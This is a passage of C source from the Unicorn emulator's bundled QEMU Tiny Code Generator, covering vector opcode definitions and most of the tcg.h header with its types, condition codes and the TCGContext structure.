IMPLVEC | IMPL(TCG_TARGET_HAS_minmax_vec)) DEF(umin_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_minmax_vec)) DEF(smax_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_minmax_vec)) DEF(umax_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_minmax_vec)) DEF(and_vec, 1, 2, 0, IMPLVEC) DEF(or_vec, 1, 2, 0, IMPLVEC) DEF(xor_vec, 1, 2, 0, IMPLVEC) DEF(andc_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_andc_vec)) DEF(orc_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_orc_vec)) DEF(not_vec, 1, 1, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_not_vec)) DEF(shli_vec, 1, 1, 1, IMPLVEC | IMPL(TCG_TARGET_HAS_shi_vec)) DEF(shri_vec, 1, 1, 1, IMPLVEC | IMPL(TCG_TARGET_HAS_shi_vec)) DEF(sari_vec, 1, 1, 1, IMPLVEC | IMPL(TCG_TARGET_HAS_shi_vec)) DEF(shls_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shs_vec)) DEF(shrs_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shs_vec)) DEF(sars_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shs_vec)) #ifdef _MSC_VER DEF(shlv_vec, 1, 2, 0, IMPLVEC) DEF(shrv_vec, 1, 2, 0, IMPLVEC) DEF(sarv_vec, 1, 2, 0, IMPLVEC) #else DEF(shlv_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shv_vec)) DEF(shrv_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shv_vec)) DEF(sarv_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shv_vec)) #endif DEF(cmp_vec, 1, 2, 1, IMPLVEC) DEF(bitsel_vec, 1, 3, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_bitsel_vec)) DEF(cmpsel_vec, 1, 4, 1, IMPLVEC | IMPL(TCG_TARGET_HAS_cmpsel_vec)) DEF(last_generic, 0, 0, 0, TCG_OPF_NOT_PRESENT) #if TCG_TARGET_MAYBE_vec #include "tcg-target.opc.h" #endif #undef TLADDR_ARGS #undef DATA64_ARGS #undef IMPL #undef IMPL64 #undef IMPLVEC #undef DEF unicorn-2.1.1/qemu/include/tcg/tcg.h /* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright 
notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef TCG_H #define TCG_H #include "cpu.h" #include "exec/memop.h" #include "exec/tb-context.h" #include "qemu/bitops.h" #include "qemu/queue.h" #include "tcg/tcg-mo.h" #include "tcg-target.h" #include "tcg-apple-jit.h" #include "qemu/int128.h" /* XXX: make safe guess about sizes */ #define MAX_OP_PER_INSTR 266 #if HOST_LONG_BITS == 32 #define MAX_OPC_PARAM_PER_ARG 2 #else #define MAX_OPC_PARAM_PER_ARG 1 #endif #define MAX_OPC_PARAM_IARGS 6 #define MAX_OPC_PARAM_OARGS 1 #define MAX_OPC_PARAM_ARGS (MAX_OPC_PARAM_IARGS + MAX_OPC_PARAM_OARGS) /* A Call op needs up to 4 + 2N parameters on 32-bit archs, * and up to 4 + N parameters on 64-bit archs * (N = number of input arguments + output arguments). */ #define MAX_OPC_PARAM (4 + (MAX_OPC_PARAM_PER_ARG * MAX_OPC_PARAM_ARGS)) #define CPU_TEMP_BUF_NLONGS 128 /* Default target word size to pointer size. */ #ifndef TCG_TARGET_REG_BITS # if UINTPTR_MAX == UINT32_MAX # define TCG_TARGET_REG_BITS 32 # elif UINTPTR_MAX == UINT64_MAX # define TCG_TARGET_REG_BITS 64 # else # error Unknown pointer size for tcg target # endif #endif #if TCG_TARGET_REG_BITS == 32 typedef int32_t tcg_target_long; typedef uint32_t tcg_target_ulong; #define TCG_PRIlx PRIx32 #define TCG_PRIld PRId32 #elif TCG_TARGET_REG_BITS == 64 typedef int64_t tcg_target_long; typedef uint64_t tcg_target_ulong; #define TCG_PRIlx PRIx64 #define TCG_PRIld PRId64 #else #error unsupported #endif /* Oversized TCG guests make things like MTTCG hard * as we can't use atomics for cputlb updates. */ #if TARGET_LONG_BITS > TCG_TARGET_REG_BITS #define TCG_OVERSIZED_GUEST 1 #else #define TCG_OVERSIZED_GUEST 0 #endif #if TCG_TARGET_NB_REGS <= 32 typedef uint32_t TCGRegSet; #elif TCG_TARGET_NB_REGS <= 64 typedef uint64_t TCGRegSet; #else #error unsupported #endif #if TCG_TARGET_REG_BITS == 32 /* Turn some undef macros into false macros. 
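This lets 32-bit hosts reference the *_i64 feature tests in ordinary C conditionals; the compiler then discards the 64-bit-only code paths.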
*/ #define TCG_TARGET_HAS_extrl_i64_i32 0 #define TCG_TARGET_HAS_extrh_i64_i32 0 #define TCG_TARGET_HAS_div_i64 0 #define TCG_TARGET_HAS_rem_i64 0 #define TCG_TARGET_HAS_div2_i64 0 #define TCG_TARGET_HAS_rot_i64 0 #define TCG_TARGET_HAS_ext8s_i64 0 #define TCG_TARGET_HAS_ext16s_i64 0 #define TCG_TARGET_HAS_ext32s_i64 0 #define TCG_TARGET_HAS_ext8u_i64 0 #define TCG_TARGET_HAS_ext16u_i64 0 #define TCG_TARGET_HAS_ext32u_i64 0 #define TCG_TARGET_HAS_bswap16_i64 0 #define TCG_TARGET_HAS_bswap32_i64 0 #define TCG_TARGET_HAS_bswap64_i64 0 #define TCG_TARGET_HAS_neg_i64 0 #define TCG_TARGET_HAS_not_i64 0 #define TCG_TARGET_HAS_andc_i64 0 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 0 #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_deposit_i64 0 #define TCG_TARGET_HAS_extract_i64 0 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_movcond_i64 0 #define TCG_TARGET_HAS_add2_i64 0 #define TCG_TARGET_HAS_sub2_i64 0 #define TCG_TARGET_HAS_mulu2_i64 0 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 0 #define TCG_TARGET_HAS_mulsh_i64 0 /* Turn some undef macros into true macros. */ #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #endif #ifndef TCG_TARGET_deposit_i32_valid #define TCG_TARGET_deposit_i32_valid(ofs, len) 1 #endif #ifndef TCG_TARGET_deposit_i64_valid #define TCG_TARGET_deposit_i64_valid(ofs, len) 1 #endif #ifndef TCG_TARGET_extract_i32_valid #define TCG_TARGET_extract_i32_valid(ofs, len) 1 #endif #ifndef TCG_TARGET_extract_i64_valid #define TCG_TARGET_extract_i64_valid(ofs, len) 1 #endif /* Only one of DIV or DIV2 should be defined. */ #if defined(TCG_TARGET_HAS_div_i32) #define TCG_TARGET_HAS_div2_i32 0 #elif defined(TCG_TARGET_HAS_div2_i32) #define TCG_TARGET_HAS_div_i32 0 #define TCG_TARGET_HAS_rem_i32 0 #endif #if defined(TCG_TARGET_HAS_div_i64) #define TCG_TARGET_HAS_div2_i64 0 #elif defined(TCG_TARGET_HAS_div2_i64) #define TCG_TARGET_HAS_div_i64 0 #define TCG_TARGET_HAS_rem_i64 0 #endif /* For 32-bit targets, some sort of unsigned widening multiply is required. 
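Either form works: TCG synthesizes 64-bit multiplies from host-word pieces and needs at least one of mulu2_i32 or muluh_i32 to obtain the full 32x32->64 product, which is what the check below enforces.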
*/ #if TCG_TARGET_REG_BITS == 32 \ && !(defined(TCG_TARGET_HAS_mulu2_i32) \ || defined(TCG_TARGET_HAS_muluh_i32)) # error "Missing unsigned widening multiply" #endif #if !defined(TCG_TARGET_HAS_v64) \ && !defined(TCG_TARGET_HAS_v128) \ && !defined(TCG_TARGET_HAS_v256) #define TCG_TARGET_MAYBE_vec 0 #define TCG_TARGET_HAS_abs_vec 0 #define TCG_TARGET_HAS_neg_vec 0 #define TCG_TARGET_HAS_not_vec 0 #define TCG_TARGET_HAS_andc_vec 0 #define TCG_TARGET_HAS_orc_vec 0 #define TCG_TARGET_HAS_shi_vec 0 #define TCG_TARGET_HAS_shs_vec 0 #define TCG_TARGET_HAS_shv_vec 0 #define TCG_TARGET_HAS_mul_vec 0 #define TCG_TARGET_HAS_sat_vec 0 #define TCG_TARGET_HAS_minmax_vec 0 #define TCG_TARGET_HAS_bitsel_vec 0 #define TCG_TARGET_HAS_cmpsel_vec 0 #else #define TCG_TARGET_MAYBE_vec 1 #endif #ifndef TCG_TARGET_HAS_v64 #define TCG_TARGET_HAS_v64 0 #endif #ifndef TCG_TARGET_HAS_v128 #define TCG_TARGET_HAS_v128 0 #endif #ifndef TCG_TARGET_HAS_v256 #define TCG_TARGET_HAS_v256 0 #endif #ifndef TARGET_INSN_START_EXTRA_WORDS # define TARGET_INSN_START_WORDS 1 #else # define TARGET_INSN_START_WORDS (1 + TARGET_INSN_START_EXTRA_WORDS) #endif typedef enum TCGOpcode { #define DEF(name, oargs, iargs, cargs, flags) INDEX_op_ ## name, #include "tcg/tcg-opc.h" #undef DEF NB_OPS, } TCGOpcode; #define tcg_regset_set_reg(d, r) ((d) |= (TCGRegSet)1 << (r)) #define tcg_regset_reset_reg(d, r) ((d) &= ~((TCGRegSet)1 << (r))) #define tcg_regset_test_reg(d, r) (((d) >> (r)) & 1) #ifndef TCG_TARGET_INSN_UNIT_SIZE # error "Missing TCG_TARGET_INSN_UNIT_SIZE" #elif TCG_TARGET_INSN_UNIT_SIZE == 1 typedef uint8_t tcg_insn_unit; #elif TCG_TARGET_INSN_UNIT_SIZE == 2 typedef uint16_t tcg_insn_unit; #elif TCG_TARGET_INSN_UNIT_SIZE == 4 typedef uint32_t tcg_insn_unit; #elif TCG_TARGET_INSN_UNIT_SIZE == 8 typedef uint64_t tcg_insn_unit; #else /* The port better have done this. */ #endif #if defined CONFIG_DEBUG_TCG || defined QEMU_STATIC_ANALYSIS # define tcg_debug_assert(X) do { assert(X); } while (0) #else #ifndef _MSC_VER # define tcg_debug_assert(X) \ do { if (!(X)) { __builtin_unreachable(); } } while (0) #else # define tcg_debug_assert(X) #endif #endif typedef struct TCGRelocation TCGRelocation; struct TCGRelocation { QSIMPLEQ_ENTRY(TCGRelocation) next; tcg_insn_unit *ptr; intptr_t addend; int type; }; typedef struct TCGLabel TCGLabel; struct TCGLabel { unsigned present : 1; unsigned has_value : 1; unsigned id : 14; unsigned refs : 16; union { uintptr_t value; tcg_insn_unit *value_ptr; } u; QSIMPLEQ_HEAD(, TCGRelocation) relocs; QSIMPLEQ_ENTRY(TCGLabel) next; }; typedef struct TCGPool { struct TCGPool *next; int size; uint8_t QEMU_ALIGN(8, data[0]); } TCGPool; #define TCG_POOL_CHUNK_SIZE 32768 #define TCG_MAX_TEMPS 512 #define TCG_MAX_INSNS 512 /* when the size of the arguments of a called function is smaller than this value, they are statically allocated in the TB stack frame */ #define TCG_STATIC_CALL_ARGS_SIZE 128 typedef enum TCGType { TCG_TYPE_I32, TCG_TYPE_I64, TCG_TYPE_V64, TCG_TYPE_V128, TCG_TYPE_V256, TCG_TYPE_COUNT, /* number of different types */ /* An alias for the size of the host register. */ #if TCG_TARGET_REG_BITS == 32 TCG_TYPE_REG = TCG_TYPE_I32, #else TCG_TYPE_REG = TCG_TYPE_I64, #endif /* An alias for the size of the native pointer. */ #if UINTPTR_MAX == UINT32_MAX TCG_TYPE_PTR = TCG_TYPE_I32, #else TCG_TYPE_PTR = TCG_TYPE_I64, #endif /* An alias for the size of the target "long", aka register. 
*/ #if TARGET_LONG_BITS == 64 TCG_TYPE_TL = TCG_TYPE_I64, #else TCG_TYPE_TL = TCG_TYPE_I32, #endif } TCGType; /** * get_alignment_bits * @memop: MemOp value * * Extract the alignment size from the memop. */ static inline unsigned get_alignment_bits(MemOp memop) { unsigned a = memop & MO_AMASK; if (a == MO_UNALN) { /* No alignment required. */ a = 0; } else if (a == MO_ALIGN) { /* A natural alignment requirement. */ a = memop & MO_SIZE; } else { /* A specific alignment requirement. */ a = a >> MO_ASHIFT; } /* The requested alignment cannot overlap the TLB flags. */ tcg_debug_assert((TLB_FLAGS_MASK & ((1 << a) - 1)) == 0); return a; } typedef tcg_target_ulong TCGArg; /* Define type and accessor macros for TCG variables. TCG variables are the inputs and outputs of TCG ops, as described in tcg/README. Target CPU front-end code uses these types to deal with TCG variables as it emits TCG code via the tcg_gen_* functions. They come in several flavours: * TCGv_i32 : 32 bit integer type * TCGv_i64 : 64 bit integer type * TCGv_ptr : a host pointer type * TCGv_vec : a host vector type; the exact size is not exposed to the CPU front-end code. * TCGv : an integer type the same size as target_ulong (an alias for either TCGv_i32 or TCGv_i64) The compiler's type checking will complain if you mix them up and pass the wrong sized TCGv to a function. Users of tcg_gen_* don't need to know about any of the internal details of these, and should treat them as opaque types. You won't be able to look inside them in a debugger either. Internal implementation details follow: Note that there is no definition of the structs TCGv_i32_d etc anywhere. This is deliberate, because the values we store in variables of type TCGv_i32 are not really pointers-to-structures. They're just small integers, but keeping them in pointer types like this means that the compiler will complain if you accidentally pass a TCGv_i32 to a function which takes a TCGv_i64, and so on. Only the internals of TCG need to care about the actual contents of the types. */ typedef struct TCGv_i32_d *TCGv_i32; typedef struct TCGv_i64_d *TCGv_i64; typedef struct TCGv_ptr_d *TCGv_ptr; typedef struct TCGv_vec_d *TCGv_vec; typedef TCGv_ptr TCGv_env; #if TARGET_LONG_BITS == 32 #define TCGv TCGv_i32 #elif TARGET_LONG_BITS == 64 #define TCGv TCGv_i64 #else #error Unhandled TARGET_LONG_BITS value #endif /* call flags */ /* Helper does not read globals (either directly or through an exception). It implies TCG_CALL_NO_WRITE_GLOBALS. */ #define TCG_CALL_NO_READ_GLOBALS 0x0001 /* Helper does not write globals */ #define TCG_CALL_NO_WRITE_GLOBALS 0x0002 /* Helper can be safely suppressed if the return value is not used. */ #define TCG_CALL_NO_SIDE_EFFECTS 0x0004 /* Helper is QEMU_NORETURN. */ #define TCG_CALL_NO_RETURN 0x0008 /* convenience version of most used call flags */ #define TCG_CALL_NO_RWG TCG_CALL_NO_READ_GLOBALS #define TCG_CALL_NO_WG TCG_CALL_NO_WRITE_GLOBALS #define TCG_CALL_NO_SE TCG_CALL_NO_SIDE_EFFECTS #define TCG_CALL_NO_RWG_SE (TCG_CALL_NO_RWG | TCG_CALL_NO_SE) #define TCG_CALL_NO_WG_SE (TCG_CALL_NO_WG | TCG_CALL_NO_SE) /* Used to align parameters. See the comment before tcgv_i32_temp. */ #define TCG_CALL_DUMMY_ARG ((TCGArg)0) /* Conditions. Note that these are laid out for easy manipulation by the functions below: bit 0 is used for inverting; bit 1 is signed, bit 2 is unsigned, bit 3 is used with bit 0 for swapping signed/unsigned. 
*/
typedef enum {
    /* non-signed */
    TCG_COND_NEVER  = 0 | 0 | 0 | 0,
    TCG_COND_ALWAYS = 0 | 0 | 0 | 1,
    TCG_COND_EQ     = 8 | 0 | 0 | 0,
    TCG_COND_NE     = 8 | 0 | 0 | 1,
    /* signed */
    TCG_COND_LT     = 0 | 0 | 2 | 0,
    TCG_COND_GE     = 0 | 0 | 2 | 1,
    TCG_COND_LE     = 8 | 0 | 2 | 0,
    TCG_COND_GT     = 8 | 0 | 2 | 1,
    /* unsigned */
    TCG_COND_LTU    = 0 | 4 | 0 | 0,
    TCG_COND_GEU    = 0 | 4 | 0 | 1,
    TCG_COND_LEU    = 8 | 4 | 0 | 0,
    TCG_COND_GTU    = 8 | 4 | 0 | 1,
} TCGCond;

/* Invert the sense of the comparison.  */
static inline TCGCond tcg_invert_cond(TCGCond c)
{
    return (TCGCond)(c ^ 1);
}

/* Swap the operands in a comparison.  */
static inline TCGCond tcg_swap_cond(TCGCond c)
{
    return c & 6 ? (TCGCond)(c ^ 9) : c;
}

/* Create an "unsigned" version of a "signed" comparison.  */
static inline TCGCond tcg_unsigned_cond(TCGCond c)
{
    return c & 2 ? (TCGCond)(c ^ 6) : c;
}

/* Create a "signed" version of an "unsigned" comparison.  */
static inline TCGCond tcg_signed_cond(TCGCond c)
{
    return c & 4 ? (TCGCond)(c ^ 6) : c;
}

/* Must a comparison be considered unsigned?  */
static inline bool is_unsigned_cond(TCGCond c)
{
    return (c & 4) != 0;
}

/* Create a "high" version of a double-word comparison.
   This removes equality from a LTE or GTE comparison.  */
static inline TCGCond tcg_high_cond(TCGCond c)
{
    switch (c) {
    case TCG_COND_GE:
    case TCG_COND_LE:
    case TCG_COND_GEU:
    case TCG_COND_LEU:
        return (TCGCond)(c ^ 8);
    default:
        return c;
    }
}

typedef enum TCGTempVal {
    TEMP_VAL_DEAD,
    TEMP_VAL_REG,
    TEMP_VAL_MEM,
    TEMP_VAL_CONST,
} TCGTempVal;

typedef struct TCGTemp {
    TCGReg reg:8;
    TCGTempVal val_type:8;
    TCGType base_type:8;
    TCGType type:8;
    unsigned int fixed_reg:1;
    unsigned int indirect_reg:1;
    unsigned int indirect_base:1;
    unsigned int mem_coherent:1;
    unsigned int mem_allocated:1;
    /* If true, the temp is saved across both basic blocks and
       translation blocks.  */
    unsigned int temp_global:1;
    /* If true, the temp is saved across basic blocks but dead at the end
       of translation blocks.  If false, the temp is dead at the end of
       basic blocks.  */
    unsigned int temp_local:1;
    unsigned int temp_allocated:1;

    tcg_target_long val;
    struct TCGTemp *mem_base;
    intptr_t mem_offset;
    const char *name;

    /* Pass-specific information that can be stored for a temporary.
       One word worth of integer data, and one pointer to data
       allocated separately.  */
    uintptr_t state;
    void *state_ptr;
} TCGTemp;

typedef struct TCGContext TCGContext;

typedef struct TCGTempSet {
    unsigned long l[BITS_TO_LONGS(TCG_MAX_TEMPS)];
} TCGTempSet;

/* While we limit helpers to 6 arguments, for 32-bit hosts, with padding,
   this implies a max of 6*2 (64-bit in) + 2 (64-bit out) = 14 operands.
   There are never more than 2 outputs, which means that we can store all
   dead + sync data within 16 bits.  */
#define DEAD_ARG 4
#define SYNC_ARG 1
typedef uint16_t TCGLifeData;

/* The layout here is designed to avoid a bitfield crossing of
   a 32-bit boundary, which would cause GCC to add extra padding.  */
typedef struct TCGOp {
#ifdef _MSC_VER
    uint32_t opc : 8;       /*  8 */
#else
    TCGOpcode opc : 8;      /*  8 */
#endif

    /* Parameters for this opcode.  See below.  */
    unsigned param1 : 4;    /* 12 */
    unsigned param2 : 4;    /* 16 */

    /* Lifetime data of the operands.  */
    unsigned life : 16;     /* 32 */

    /* Next and previous opcodes.  */
    QTAILQ_ENTRY(TCGOp) link;

    /* Arguments for the opcode.  */
    TCGArg args[MAX_OPC_PARAM];

    /* Register preferences for the output(s).
*/ TCGRegSet output_pref[2]; } TCGOp; #define TCGOP_CALLI(X) (X)->param1 #define TCGOP_CALLO(X) (X)->param2 #define TCGOP_VECL(X) (X)->param1 #define TCGOP_VECE(X) (X)->param2 /* Make sure operands fit in the bitfields above. */ QEMU_BUILD_BUG_ON(NB_OPS > (1 << 8)); typedef struct TCGProfile { int64_t cpu_exec_time; int64_t tb_count1; int64_t tb_count; int64_t op_count; /* total insn count */ int op_count_max; /* max insn per TB */ int temp_count_max; int64_t temp_count; int64_t del_op_count; int64_t code_in_len; int64_t code_out_len; int64_t search_out_len; int64_t interm_time; int64_t code_time; int64_t la_time; int64_t opt_time; int64_t restore_count; int64_t restore_time; int64_t table_op_count[NB_OPS]; } TCGProfile; /* * We divide code_gen_buffer into equally-sized "regions" that TCG threads * dynamically allocate from as demand dictates. Given appropriate region * sizing, this minimizes flushes even when some TCG threads generate a lot * more code than others. */ typedef struct TCGOpDef TCGOpDef; struct tcg_region_state { /* fields set at init time */ void *start; void *start_aligned; void *end; size_t n; size_t size; /* size of one region */ size_t stride; /* .size + guard size */ size_t current; /* current region index */ size_t agg_size_full; /* aggregate size of full regions */ }; struct TCGContext { uint8_t *pool_cur, *pool_end; TCGPool *pool_first, *pool_current, *pool_first_large; int nb_labels; int nb_globals; int nb_temps; int nb_indirects; int nb_ops; /* goto_tb support */ tcg_insn_unit *code_buf; uint16_t *tb_jmp_reset_offset; /* tb->jmp_reset_offset */ uintptr_t *tb_jmp_insn_offset; /* tb->jmp_target_arg if direct_jump */ uintptr_t *tb_jmp_target_addr; /* tb->jmp_target_arg if !direct_jump */ TCGRegSet reserved_regs; uint32_t tb_cflags; /* cflags of the current TB */ intptr_t current_frame_offset; intptr_t frame_start; intptr_t frame_end; TCGTemp *frame_temp; tcg_insn_unit *code_ptr; #ifdef CONFIG_DEBUG_TCG int temps_in_use; int goto_tb_issue_mask; const TCGOpcode *vecop_list; #endif /* Code generation. Note that we specifically do not use tcg_insn_unit here, because there's too much arithmetic throughout that relies on addition and subtraction working on bytes. Rely on the GCC extension that allows arithmetic on void*. */ void *code_gen_prologue; void *code_gen_epilogue; void *code_gen_buffer; void *initial_buffer; size_t initial_buffer_size; size_t code_gen_buffer_size; void *code_gen_ptr; void *data_gen_ptr; /* Threshold to flush the translated code buffer. */ void *code_gen_highwater; size_t tb_phys_invalidate_count; /* Track which vCPU triggers events */ CPUState *cpu; /* *_trans */ /* These structures are private to tcg-target.inc.c. */ #ifdef TCG_TARGET_NEED_LDST_LABELS QSIMPLEQ_HEAD(, TCGLabelQemuLdst) ldst_labels; #endif #ifdef TCG_TARGET_NEED_POOL_LABELS struct TCGLabelPoolData *pool_labels; #endif TCGLabel *exitreq_label; TCGTempSet free_temps[TCG_TYPE_COUNT * 2]; TCGTemp temps[TCG_MAX_TEMPS]; /* globals first, temps after */ QTAILQ_HEAD(, TCGOp) ops, free_ops; QSIMPLEQ_HEAD(, TCGLabel) labels; /* Tells which temporary holds a given register. It does not take into account fixed registers */ TCGTemp *reg_to_temp[TCG_TARGET_NB_REGS]; uint16_t gen_insn_end_off[TCG_MAX_INSNS]; target_ulong gen_insn_data[TCG_MAX_INSNS][TARGET_INSN_START_WORDS]; /* qemu/accel/tcg/translate-all.c */ TBContext tb_ctx; /* qemu/include/exec/gen-icount.h */ TCGOp *icount_start_insn; /* qemu/tcg/tcg.c */ GHashTable *helper_table; GHashTable *custom_helper_infos; // To support inline hooks. 
TCGv_ptr cpu_env;
    struct tcg_region_state region;
    GTree *tree;
    TCGRegSet tcg_target_available_regs[TCG_TYPE_COUNT];
    TCGRegSet tcg_target_call_clobber_regs;
    int *indirect_reg_alloc_order;
    struct jit_code_entry *one_entry;
    /* qemu/tcg/tcg-common.c */
    TCGOpDef *tcg_op_defs;

    // Unicorn engine variables
    struct uc_struct *uc;
    /* qemu/target/i386/translate.c: global register indexes */
    TCGv cpu_cc_dst, cpu_cc_src, cpu_cc_src2;
    TCGv_i32 cpu_cc_op;
    TCGv cpu_regs[56]; // 16 GPRs for x64
    /* only x86 needs cpu_seg_base[].  */
    TCGv cpu_seg_base[6];
    TCGv_i64 cpu_bndl[4];
    TCGv_i64 cpu_bndu[4];
    /* qemu/tcg/i386/tcg-target.inc.c */
    void *tb_ret_addr;
    /* target/riscv/translate.c */
    TCGv cpu_gpr[32], cpu_pc; // also target/mips/translate.c
    TCGv_i64 cpu_fpr[32]; /* assume F and D extensions */
    TCGv load_res;
    TCGv load_val;
    // target/arm/translate.c
    /* We reuse the same 64-bit temporaries for efficiency.  */
    TCGv_i64 cpu_V0, cpu_V1, cpu_M0;
    TCGv_i32 cpu_R[16];
    TCGv_i32 cpu_CF, cpu_NF, cpu_VF, cpu_ZF;
    TCGv_i64 cpu_exclusive_addr;
    TCGv_i64 cpu_exclusive_val;
    // target/arm/translate-a64.c
    TCGv_i64 cpu_X[32];
    TCGv_i64 cpu_pc_arm64;
    /* Load/store exclusive handling */
    TCGv_i64 cpu_exclusive_high;
    // target/mips/translate.c
    // #define MIPS_DSP_ACC 4
    // TCGv cpu_HI[MIPS_DSP_ACC], cpu_LO[MIPS_DSP_ACC];
    TCGv cpu_HI[4], cpu_LO[4];
    TCGv cpu_dspctrl, btarget, bcond;
    TCGv cpu_lladdr, cpu_llval;
    TCGv_i32 hflags;
    TCGv_i32 fpu_fcr0, fpu_fcr31;
    TCGv_i64 fpu_f64[32];
    TCGv_i64 msa_wr_d[64];
#if defined(TARGET_MIPS64)
    /* Upper halves of R5900's 128-bit registers: MMRs (multimedia registers) */
    TCGv_i64 cpu_mmr[32];
#endif
#if !defined(TARGET_MIPS64)
    /* MXU registers */
    // #define NUMBER_OF_MXU_REGISTERS 16
    // TCGv mxu_gpr[NUMBER_OF_MXU_REGISTERS - 1];
    TCGv mxu_gpr[16 - 1];
    TCGv mxu_CR;
#endif
    // target/sparc/translate.c
    /* global register indexes */
    TCGv_ptr cpu_regwptr;
    // TCGv cpu_cc_src, cpu_cc_src2, cpu_cc_dst;
    // TCGv_i32 cpu_cc_op;
    TCGv_i32 cpu_psr;
    TCGv cpu_fsr, cpu_npc;
    // TCGv cpu_regs[32];
    TCGv cpu_y;
    TCGv cpu_tbr;
    TCGv cpu_cond;
#ifdef TARGET_SPARC64
    TCGv_i32 cpu_xcc, cpu_fprs;
    TCGv cpu_gsr;
    TCGv cpu_tick_cmpr, cpu_stick_cmpr, cpu_hstick_cmpr;
    TCGv cpu_hintp, cpu_htba, cpu_hver, cpu_ssr, cpu_ver;
#else
    TCGv cpu_wim;
#endif
    /* Floating point registers */
    // TCGv_i64 cpu_fpr[TARGET_DPREGS];
    // target/m68k/translate.c
    TCGv_i32 cpu_halted;
    TCGv_i32 cpu_exception_index;
    char cpu_reg_names[2 * 8 * 3 + 5 * 4];
    TCGv cpu_dregs[8];
    TCGv cpu_aregs[8];
    TCGv_i64 cpu_macc[4];
    TCGv NULL_QREG;
    /* Used to distinguish stores from bad addressing modes.  */
    TCGv store_dummy;
    // target/tricore/translate.c
    TCGv_i32 cpu_gpr_a[16];
    TCGv_i32 cpu_gpr_d[16];
    TCGv_i32 cpu_PSW_C, cpu_PSW_V, cpu_PSW_SV, cpu_PSW_AV, cpu_PSW_SAV;
    TCGv_i32 cpu_PC, cpu_PCXI, cpu_PSW, cpu_ICR;
    // Used to store the start of the current instruction.
    uint64_t pc_start;
    // target/s390x/translate.c
    TCGv_i64 psw_addr;
    TCGv_i64 psw_mask;
    TCGv_i64 gbea;
    TCGv_i32 cc_op;
    TCGv_i64 cc_src;
    TCGv_i64 cc_dst;
    TCGv_i64 cc_vr;
    char s390x_cpu_reg_names[16][4]; // renamed from original cpu_reg_names[][] to avoid a name clash with m68k
    TCGv_i64 regs[16];
};

static inline size_t temp_idx(TCGContext *tcg_ctx, TCGTemp *ts)
{
    ptrdiff_t n = ts - tcg_ctx->temps;
    tcg_debug_assert(n >= 0 && n < tcg_ctx->nb_temps);
    return n;
}

static inline TCGArg temp_arg(TCGTemp *ts)
{
    return (uintptr_t)ts;
}

static inline TCGTemp *arg_temp(TCGArg a)
{
    return (TCGTemp *)(uintptr_t)a;
}

/* Using the offset of a temporary, relative to TCGContext, rather than
   its index means that we don't use 0.
That leaves offset 0 free for a NULL representation without having to leave index 0 unused. */ static inline TCGTemp *tcgv_i32_temp(TCGContext *tcg_ctx, TCGv_i32 v) { uintptr_t o = (uintptr_t)v; TCGTemp *t = (TCGTemp *)((char *)tcg_ctx + o); tcg_debug_assert(offsetof(TCGContext, temps[temp_idx(tcg_ctx, t)]) == o); return t; } static inline TCGTemp *tcgv_i64_temp(TCGContext *tcg_ctx, TCGv_i64 v) { return tcgv_i32_temp(tcg_ctx, (TCGv_i32)v); } static inline TCGTemp *tcgv_ptr_temp(TCGContext *tcg_ctx, TCGv_ptr v) { return tcgv_i32_temp(tcg_ctx, (TCGv_i32)v); } static inline TCGTemp *tcgv_vec_temp(TCGContext *tcg_ctx, TCGv_vec v) { return tcgv_i32_temp(tcg_ctx, (TCGv_i32)v); } static inline TCGArg tcgv_i32_arg(TCGContext *tcg_ctx, TCGv_i32 v) { return temp_arg(tcgv_i32_temp(tcg_ctx, v)); } static inline TCGArg tcgv_i64_arg(TCGContext *tcg_ctx, TCGv_i64 v) { return temp_arg(tcgv_i64_temp(tcg_ctx, v)); } static inline TCGArg tcgv_ptr_arg(TCGContext *tcg_ctx, TCGv_ptr v) { return temp_arg(tcgv_ptr_temp(tcg_ctx, v)); } static inline TCGArg tcgv_vec_arg(TCGContext *tcg_ctx, TCGv_vec v) { return temp_arg(tcgv_vec_temp(tcg_ctx, v)); } static inline TCGv_i32 temp_tcgv_i32(TCGContext *tcg_ctx, TCGTemp *t) { (void)temp_idx(tcg_ctx, t); /* trigger embedded assert */ 